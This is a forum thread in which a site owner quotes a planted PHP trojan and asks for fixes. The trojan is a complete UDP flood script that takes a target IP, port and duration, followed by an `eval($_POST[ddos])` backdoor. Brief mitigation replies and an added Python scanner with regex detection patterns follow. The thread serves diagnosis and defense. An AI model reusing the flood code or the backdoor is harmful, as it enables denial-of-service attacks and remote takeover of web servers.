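Recently I keep running into client websites that have had a PHP trojan planted on them, as follows:
<?
// Visit ddos.php?ip=192.168.1.1&port=80&time=1 to carry out the attack; the time value is the duration in seconds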
?><?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?><?php eval($_POST[ddos])?>
This causes the server to send packets outbound. I have never been able to find a root-cause solution; asking the experts for advice!
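2. Block the IPs that send junk requests
3. Normalize PHP's internal request variables (GET, POST), use a single entry point, and classify and manage requests by level
Most people install an anti-interference module on the server and block the IPs.
2. Disable gzinflate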
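An added example, not part of the original thread: a small Python scanner that walks a web root and flags PHP files containing the constructs visible in the sample posted above (`eval` of request data, `fsockopen` on a `udp://` target, `set_time_limit(0)`) plus the `gzinflate` decoding mentioned in the last reply. The regular expressions, the extension list and the demo directory are this example's own assumptions.

```python
import re
import tempfile
from pathlib import Path

# Indicators drawn from the posted sample and the gzinflate reply;
# the exact patterns are this example's choice, not a vetted signature set.
INDICATORS = {
    "eval-of-request-data": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)", re.I),
    "udp-socket": re.compile(r"fsockopen\s*\(\s*[\"']udp://", re.I),
    "no-time-limit": re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I),
    "gzinflate-decode": re.compile(r"gzinflate\s*\(", re.I),
}
PHP_EXT = {".php", ".phtml", ".php5", ".inc"}  # assumed list of executable extensions

def scan_file(path):
    """Return the sorted names of the indicators found in one file."""
    text = Path(path).read_text(errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root):
    """Map each suspicious PHP file (path relative to root) to its indicator hits."""
    findings = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in PHP_EXT:
            hits = scan_file(p)
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Scan a constructed web root: one clean page and two planted files."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        (root / "uploads").mkdir()
        (root / "uploads" / "ddos.php").write_text(
            '<?php set_time_limit(0);\n'
            '$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);\n'
            '?><?php eval($_POST[ddos])?>'
        )
        (root / "uploads" / "x.php").write_text(
            "<?php eval(gzinflate(base64_decode($s))); ?>"
        )
        return scan_tree(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

A single hit such as `set_time_limit(0)` also occurs in legitimate code, so treat files with several indicators, or any hit inside an upload directory, as the ones to inspect first.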